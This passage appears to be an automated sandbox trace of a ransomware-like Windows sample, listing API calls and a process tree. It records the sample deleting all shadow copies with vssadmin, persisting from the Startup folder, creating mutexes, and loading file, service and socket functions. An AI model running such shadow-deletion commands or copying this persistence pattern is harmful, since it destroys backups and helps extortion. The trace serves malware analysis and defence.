hStdOutput=0xf4, hStdError=0xf4)) [0032.636] GetProcessHeap () returned 0x280000 [0032.636] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x20) returned 0x294640 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0032.636] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.637] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0032.637] GetProcessHeap () returned 0x280000 [0032.637] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x294640 | out: hHeap=0x280000) returned 1 [0032.637] GetProcessHeap () returned 0x280000 [0032.637] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x12) returned 0x298900 [0032.637] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18f120*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f0d0 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x18f0d0*(hProcess=0x50, hThread=0x54, dwProcessId=0xaf8, dwThreadId=0xafc)) returned 1 [0032.644] CloseHandle (hObject=0x54) returned 1 [0032.644] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0032.644] GetProcessHeap () returned 0x280000 [0032.644] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29eb10 | out: hHeap=0x280000) returned 1 [0032.644] GetEnvironmentStringsW () returned 0x29eb10* [0032.644] GetProcessHeap () returned 0x280000 [0032.644] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xb0e) returned 0x29f630 [0032.644] FreeEnvironmentStringsW (penv=0x29eb10) returned 1 [0032.644] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x18e9d8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x18e9d8, ReturnLength=0x0) returned 0x0 [0032.644] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdf000, lpBuffer=0x18ea10, nSize=0x380, lpNumberOfBytesRead=0x18e9d0 | out: lpBuffer=0x18ea10*, lpNumberOfBytesRead=0x18e9d0*=0x380) returned 1 [0032.644] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) Process: id = "3" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x4dd7d000" os_pid = "0xae8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa9c" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0xaec Process: id = "4" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x4d38e000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa9c" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 20 os_tid = 0xafc Thread: id = 21 os_tid = 0xb0c Thread: id = 22 os_tid = 0xb14 Thread: id = 24 os_tid = 0xb1c Thread: id = 25 os_tid = 0xb20 Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x46a7c000" os_pid = "0xbbc" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xaf8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007a32b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 27 os_tid = 0xbd4 Thread: id = 28 os_tid = 0xbd0 Thread: id = 29 os_tid = 0xbcc [0043.998] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcdda70 | out: lpSystemTimeAsFileTime=0xcdda70*(dwLowDateTime=0x42188ab0, dwHighDateTime=0x1d5351d)) [0043.998] GetCurrentProcessId () returned 0xbbc [0043.998] GetCurrentThreadId () returned 0xbcc [0043.998] GetTickCount () returned 0x1aa71 [0043.998] QueryPerformanceCounter (in: lpPerformanceCount=0xcdda78 | out: lpPerformanceCount=0xcdda78*=16418882233) returned 1 [0043.998] malloc (_Size=0x100) returned 0x248e80 Thread: id = 30 os_tid = 0xbc8 Thread: id = 31 os_tid = 0xbc4 Thread: id = 32 os_tid = 0xbc0 Thread: id = 33 os_tid = 0xbd8 Thread: id = 48 os_tid = 0xbf4 Thread: id = 55 os_tid = 0x944 Thread: id = 78 os_tid = 0x2a8 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xbbc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 34 os_tid = 0xb94 Thread: id = 35 os_tid = 0x808 Thread: id = 36 os_tid = 0x76c Thread: id = 37 os_tid = 0x758 Thread: id = 38 os_tid = 0x74c Thread: id = 39 os_tid = 0x72c Thread: id = 40 os_tid = 0x71c Thread: id = 41 os_tid = 0x718 Thread: id = 42 os_tid = 0x638 Thread: id = 43 os_tid = 0x154 Thread: id = 44 os_tid = 0x150 Thread: id = 45 os_tid = 0x12c Thread: id = 46 os_tid = 0x120 Thread: id = 47 os_tid = 0x3fc Thread: id = 56 os_tid = 0x7e4 Thread: id = 76 os_tid = 0x3c0 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x43381000" os_pid = "0xbdc" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xbbc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007b048" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 49 os_tid = 0xbf8 Thread: id = 50 os_tid = 0xbf0 Thread: id = 51 os_tid = 0xbec Thread: id = 52 os_tid = 0xbe8 Thread: id = 53 os_tid = 0xbe4 Thread: id = 54 os_tid = 0xbe0 Thread: id = 79 os_tid = 0x910 Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x910c000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0x60a00000" monitor_reason = "rpc_server" parent_id = "6" os_parent_pid = "0x3f8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c4" [0xc000000f], "LOCAL" [0x7] Thread: id = 57 os_tid = 0xb98 Thread: id = 58 os_tid = 0xa0c Thread: id = 59 os_tid = 0x9cc Thread: id = 60 os_tid = 0x754 Thread: id = 61 os_tid = 0x704 Thread: id = 62 os_tid = 0x6e0 Thread: id = 63 os_tid = 0x6b0 Thread: id = 64 os_tid = 0x698 Thread: id = 65 os_tid = 0x678 Thread: id = 66 os_tid = 0x630 Thread: id = 67 os_tid = 0x610 Thread: id = 68 os_tid = 0x14c Thread: id = 69 os_tid = 0x140 Thread: id = 70 os_tid = 0x158 Thread: id = 71 os_tid = 0x294 Thread: id = 72 os_tid = 0x218 Thread: id = 73 os_tid = 0x230 Thread: id = 74 os_tid = 0x21c Thread: id = 75 os_tid = 0x1c4 Thread: id = 77 os_tid = 0x660 Thread: id = 80 os_tid = 0x5b8 Process: id = "9" image_name = "ivttvf.exe" filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\ivttvf.exe" page_root = "0x75320000" os_pid = "0x4e0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "autostart" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ivttvf.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 81 os_tid = 0x4e4 [0262.883] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76e20000 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetProcAddress") returned 0x76e31222 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetModuleHandleW") returned 0x76e334b0 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="FindNextFileW") returned 0x76e354ee [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="FindClose") returned 0x76e34442 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="MoveFileW") returned 0x76e49af0 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetFileSizeEx") returned 0x76e359e2 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetModuleFileNameW") returned 0x76e34950 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetFileAttributesW") returned 0x76e31b18 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="ExitProcess") returned 0x76e37a10 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetCommandLineW") returned 0x76e35223 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetComputerNameW") returned 0x76e3dd0e [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetComputerNameA") returned 0x76e4b6e0 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="CreateMutexW") returned 0x76e3424c [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="lstrlenW") returned 0x76e31700 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="lstrlenA") returned 0x76e35a4b [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetCurrentProcess") returned 0x76e31809 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="WaitForSingleObject") returned 0x76e31136 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetLogicalDrives") returned 0x76e35371 [0262.884] GetProcAddress (hModule=0x76e20000, lpProcName="GetTickCount") returned 0x76e3110c [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="DeleteFileW") returned 0x76e389b3 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="WideCharToMultiByte") returned 0x76e3170d [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e31916 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="Sleep") returned 0x76e310ff [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="LeaveCriticalSection") returned 0x77df2270 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="ReadFile") returned 0x76e33ed3 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="CreateFileW") returned 0x76e33f5c [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="OpenMutexW") returned 0x76e35151 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="EnterCriticalSection") returned 0x77df22b0 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="WaitForMultipleObjects") returned 0x76e34220 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="lstrcmpiW") returned 0x76e4d5cd [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="lstrcmpiA") returned 0x76e33e8e [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="DeleteCriticalSection") returned 0x77e045f5 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="ReleaseMutex") returned 0x76e3111e [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="CloseHandle") returned 0x76e31410 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="GetVersion") returned 0x76e34467 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="CreateThread") returned 0x76e334d5 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76e34173 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="QueryPerformanceCounter") returned 0x76e31725 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="QueryPerformanceFrequency") returned 0x76e341f0 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="GetCurrentProcessId") returned 0x76e311f8 [0262.885] GetProcAddress (hModule=0x76e20000, lpProcName="SetFileAttributesW") returned 0x76e4d4f7 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="GetVolumeInformationW") returned 0x76e4c860 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="WriteFile") returned 0x76e31282 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="SetFilePointerEx") returned 0x76e4c807 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="SetEndOfFile") returned 0x76e4ce2e [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="FindFirstFileW") returned 0x76e34435 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="GetProcessHeap") returned 0x76e314e9 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="HeapReAlloc") returned 0x77e11f6e [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="HeapAlloc") returned 0x77dfe026 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="HeapFree") returned 0x76e314c9 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="CreatePipe") returned 0x76eb415b [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="SetHandleInformation") returned 0x76e4195c [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="CreateProcessW") returned 0x76e3103d [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="CompareStringW") returned 0x76e33bca [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="CompareStringA") returned 0x76e33c5a [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="OpenProcess") returned 0x76e31986 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="TerminateProcess") returned 0x76e4d802 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="GetSystemTime") returned 0x76e35a96 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="SystemTimeToFileTime") returned 0x76e35a7e [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="GetLastError") returned 0x76e311c0 [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e5735f [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="Process32NextW") returned 0x76e5896c [0262.886] GetProcAddress (hModule=0x76e20000, lpProcName="Process32FirstW") returned 0x76e58baf [0262.886] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77100000 [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="RegOpenKeyExW") returned 0x7711468d [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="RegQueryValueExW") returned 0x771146ad [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="RegSetValueExW") returned 0x771114d6 [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="RegCloseKey") returned 0x7711469d [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="OpenProcessToken") returned 0x77114304 [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="GetTokenInformation") returned 0x7711431c [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="OpenSCManagerW") returned 0x7710ca64 [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="OpenServiceW") returned 0x7710ca4c [0263.429] GetProcAddress (hModule=0x77100000, lpProcName="CloseServiceHandle") returned 0x7711369c [0263.430] GetProcAddress (hModule=0x77100000, lpProcName="ControlService") returned 0x77127144 [0263.430] GetProcAddress (hModule=0x77100000, lpProcName="QueryServiceStatus") returned 0x77112a86 [0263.430] GetProcAddress (hModule=0x77100000, lpProcName="EnumDependentServicesW") returned 0x77101e3a [0263.430] GetProcAddress (hModule=0x77100000, lpProcName="EnumServicesStatusExW") returned 0x7710b466 [0263.430] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76030000 [0263.438] GetProcAddress (hModule=0x76030000, lpProcName="SystemParametersInfoW") returned 0x760490d3 [0263.438] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x761d0000 [0263.441] GetProcAddress (hModule=0x761d0000, lpProcName="ShellExecuteExW") returned 0x761f1e46 [0263.441] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77dd0000 [0263.441] GetProcAddress (hModule=0x77dd0000, lpProcName="NtQuerySystemInformation") returned 0x77defda0 [0263.441] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x739f0000 [0263.448] GetProcAddress (hModule=0x739f0000, lpProcName="WNetCloseEnum") returned 0x739f2dd6 [0263.448] GetProcAddress (hModule=0x739f0000, lpProcName="WNetOpenEnumW") returned 0x739f2f06 [0263.449] GetProcAddress (hModule=0x739f0000, lpProcName="WNetEnumResourceW") returned 0x739f3058 [0263.449] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x76f60000 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="WSAStartup") returned 0x76f63ab2 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="socket") returned 0x76f63eb8 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="send") returned 0x76f66f01 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="recv") returned 0x76f66b0e [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="connect") returned 0x76f66bdd [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="closesocket") returned 0x76f63918 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="gethostbyname") returned 0x76f77673 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="inet_addr") returned 0x76f6311b [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="ntohl") returned 0x76f62d57 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="htonl") returned 0x76f62d57 [0263.477] GetProcAddress (hModule=0x76f60000, lpProcName="htons") returned 0x76f62d8b [0263.477] GetProcessHeap () returned 0x5e0000 [0263.477] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x5f4210 [0263.477] QueryPerformanceCounter (in: lpPerformanceCount=0x18fdb8 | out: lpPerformanceCount=0x18fdb8*=6829334258) returned 1 [0263.477] GetTickCount () returned 0x61dd [0263.477] GetCurrentProcessId () returned 0x4e0 [0263.478] GetTickCount () returned 0x61dd [0263.478] GetTickCount () returned 0x61dd [0263.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x5f4238 [0263.478] GetVersion () returned 0x1db10106 [0263.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7) returned 0x5e3820 [0263.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f0d40 [0263.478] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0d40, Size=0x20) returned 0x5f4288 [0263.478] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4288, Size=0x40) returned 0x5f4820 [0263.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x5f4a98 [0263.478] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_5M390TA") returned 0x0 [0263.478] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_5M390TA") returned 0x84 [0263.478] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e3820 | out: hHeap=0x5e0000) returned 1 [0263.478] lstrlenW (lpString="Global\\syncronize_") returned 18 [0263.478] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4820 | out: hHeap=0x5e0000) returned 1 [0263.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x7) returned 0x5e3820 [0263.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x5f0d40 [0263.478] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f0d40, Size=0x20) returned 0x5f4288 [0263.478] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x5f4288, Size=0x40) returned 0x5f4820 [0263.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x604aa0 [0263.479] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_5M390TU") returned 0x0 [0263.479] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_5M390TU") returned 0x88 [0263.479] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5e3820 | out: hHeap=0x5e0000) returned 1 [0263.479] lstrlenW (lpString="Global\\syncronize_") returned 18 [0263.479] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4820 | out: hHeap=0x5e0000) returned 1 [0263.479] GetVersion () returned 0x1db10106 [0263.479] GetCurrentProcess () returned 0xffffffff [0263.479] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fda4 | out: TokenHandle=0x18fda4*=0x8c) returned 1 [0263.479] GetTokenInformation (in: 